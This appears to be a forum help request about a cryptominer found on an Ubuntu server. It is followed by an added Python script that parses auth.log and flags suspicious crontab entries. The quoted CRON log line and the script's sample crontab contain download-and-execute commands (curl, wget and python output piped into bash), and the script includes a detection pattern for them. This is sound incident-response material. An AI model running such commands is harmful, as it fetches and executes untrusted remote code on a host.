It seems someone gained access to my Ubuntu server and installed a cryptominer. This user added a crontab for the user "git" on my server. I disconnected the server from the internet and I am trying to find out how this person gained access to this git user. However, I have not found any successful sshd connections. I did find a lot of failed password attempts.
In the syslog I have found the following:
Jul 15 10:57:25 servername crontab[2816584]: (git) LIST (git)
Jul 15 10:57:25 servername crontab[2816588]: (git) REPLACE (git)
Jul 15 11:09:01 servername CRON[3005313]: (git) CMD ((curl -fsSL https://pastebin.com/raw/LYdmF72J||wget -q -O- https://pastebin.com/raw/LYdmF72J||python -c 'import urllib2 as fb1;print fb1.urlopen("https://pastebin.com/raw/LYdmF72J").read()')| bash -sh)
In the auth.log I find a lot of failed password attempts with different users, including the "git" user. One example of this for a non-existent user "testuser":
Jul 9 04:57:07 servername sshd[2056938]: Failed password for invalid user testuser from 2.57.122.150 port 33308 ssh2
Jul 9 04:57:10 servername sshd[2056938]: Connection closed by invalid user testuser 2.57.122.150 port 33308 [preauth]
A lot of failed password attempts, but none seem successful. Can someone help me investigate this?
Thanks in advance.
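As an added example (not code from the original poster), the script below shows the two log-review steps a responder would run on this evidence: parse auth.log for both failed and accepted sshd logins (key-based logins show up as "Accepted publickey", not "Accepted password", so grepping only for password failures misses them) and correlate any accepted login with IPs that were previously brute-forcing; then scan crontab entries for the download-and-execute shape seen in the CRON line above. All log lines, the IP 203.0.113.7, the key fingerprint and the pastebin.example URL are constructed sample data; only 2.57.122.150 and the cron command shape come from the post.

```python
import re
from collections import Counter

# Constructed sample auth.log excerpt (only 2.57.122.150 comes from the post;
# 203.0.113.7, the fingerprint and the times are made up for this example).
SAMPLE_AUTH_LOG = """\
Jul  9 04:57:07 servername sshd[2056938]: Failed password for invalid user testuser from 2.57.122.150 port 33308 ssh2
Jul  9 04:57:10 servername sshd[2056938]: Connection closed by invalid user testuser 2.57.122.150 port 33308 [preauth]
Jul  9 05:01:12 servername sshd[2057101]: Failed password for git from 203.0.113.7 port 40122 ssh2
Jul  9 05:01:15 servername sshd[2057101]: Failed password for git from 203.0.113.7 port 40122 ssh2
Jul 15 10:55:48 servername sshd[2816400]: Accepted publickey for git from 203.0.113.7 port 51000 ssh2: RSA SHA256:EXAMPLEFINGERPRINT
Jul 15 10:56:02 servername sshd[2816400]: pam_unix(sshd:session): session opened for user git by (uid=0)
"""

# Constructed crontab for the git user; the URL is a placeholder, not the real one.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * ps aux | grep -c sshd > /tmp/sshd.count
* * * * * (curl -fsSL https://pastebin.example/raw/PLACEHOLDER||wget -q -O- https://pastebin.example/raw/PLACEHOLDER) | bash -sh
*/10 * * * * python -c 'import urllib2 as fb1;print fb1.urlopen("https://pastebin.example/raw/PLACEHOLDER").read()' | bash -sh
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)"
)
# Covers "Accepted password", "Accepted publickey" and "Accepted keyboard-interactive".
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>[\w-]+) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)"
)
# A downloader (curl/wget) or an inline interpreter whose output is piped into a shell.
DOWNLOAD_EXEC_RE = re.compile(r"(?:curl|wget|python\S*\s+-c).*?\|\s*(?:ba)?sh\b")


def parse_auth_log(text):
    """Count failed logins per (user, source IP) and collect every accepted login."""
    failed = Counter()
    accepted = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failed[(m["user"], m["ip"])] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted.append({"method": m["method"], "user": m["user"], "ip": m["ip"]})
    return {"failed": failed, "accepted": accepted}


def correlate(parsed):
    """Accepted logins from an IP that also appears among the failed attempts."""
    failed_ips = {ip for (_, ip) in parsed["failed"]}
    return [a for a in parsed["accepted"] if a["ip"] in failed_ips]


def top_attackers(parsed, min_failures=2):
    """Source IPs ranked by total failed attempts, keeping those at or above the threshold."""
    by_ip = Counter()
    for (_, ip), n in parsed["failed"].items():
        by_ip[ip] += n
    return [(ip, n) for ip, n in by_ip.most_common() if n >= min_failures]


def suspicious_cron_entries(crontab_text):
    """Non-comment crontab lines that fetch remote content and pipe it into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if DOWNLOAD_EXEC_RE.search(line):
            hits.append(line)
    return hits


if __name__ == "__main__":
    parsed = parse_auth_log(SAMPLE_AUTH_LOG)
    print("brute-force sources:", top_attackers(parsed))
    print("accepted logins from brute-forcing IPs:", correlate(parsed))
    print("suspicious cron entries:", suspicious_cron_entries(SAMPLE_CRONTAB))
```

On a live system the same functions would be fed `/var/log/auth.log*` (including rotated, gzipped copies, since the first successful login may predate the cron activity) and the output of `crontab -l -u git` plus `/etc/cron.d`; an accepted publickey login for git would also point at `~git/.ssh/authorized_keys` as the next file to review.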